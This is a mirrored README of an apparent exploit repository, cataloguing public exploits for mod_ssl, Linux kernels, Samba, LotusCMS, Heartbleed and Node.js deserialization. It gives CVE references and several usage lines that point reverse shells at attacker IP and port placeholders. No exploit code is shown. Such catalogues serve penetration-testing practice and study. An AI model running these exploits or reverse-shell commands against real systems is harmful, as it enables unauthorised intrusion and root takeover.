Code Monkey home page Code Monkey logo

exploits's Introduction

exploits

This repository contains the list of public exploits. There may be some modification done to the original exploit but due credit is being given to the original authors. The purpose of this repository is to consolidate the list of working exploits and use them on the fly. Below are the list of exploits along with their desciption

openfuck.c : mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. This will allow to get a shell. Ref: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082

ptrace-kmod.c : Local root exploit for ptrace/kmod that exploits a race condition which creates a kernel thread in an insecure manner. Works under the 2.2.x and 2.4.x series of kernels. This will allow to get root privilege.

9542.c, 9545.c : Linux privilege escalation exploit.Exploits the linux kernel Linux kernel 2.6 < 2.6.19 (32bit). This will allow to get root privilege. Ref: https://www.exploit-db.com/exploits/9542/ https://www.exploit-db.com/exploits/9545/

10.c : Remote root exploit for Samba 2.2.x and prior. This will allow to get root privilege. Ref: https://www.exploit-db.com/exploits/10/

smb-exploit : A buffer overflow vulnerability affecting Samba 2.2.8 and below. This will allow to get root privilege.

php-reverse-shell : Get the reverse shell. Set the parameters : $ip = 'Attacker IP'; and $port = Attacker Port;

lucky_lotus.py : Remote Code Execution flaw in LotusCMS which allows to get a reverse shell on the victim. Ref: https://github.com/XiphosResearch/exploits/tree/master/LotusCMS Usage: python lucky_lotus.py http://victim-ip/root-cms-directory back_python.php Attacker-IP Attacker-Port

heartbleed.py : This is the script to exploit heartbleed vulnerability. Usage: python heartbleed.py -n 10 10.10.10.79 -v Try with different values of -n

nodejsshell.py : This script exploits the desearilazation vulnerability in nodejs and allows RCE Usage nodejsshell.py 10.10.14.239 80 Ref https://www.exploit-db.com/docs/english/41289-exploiting-node.js-deserialization-bug-for-remote-code-execution.pdf

exploits's People

Contributors

piyush-saurabh avatar

Watchers

James Cloos avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.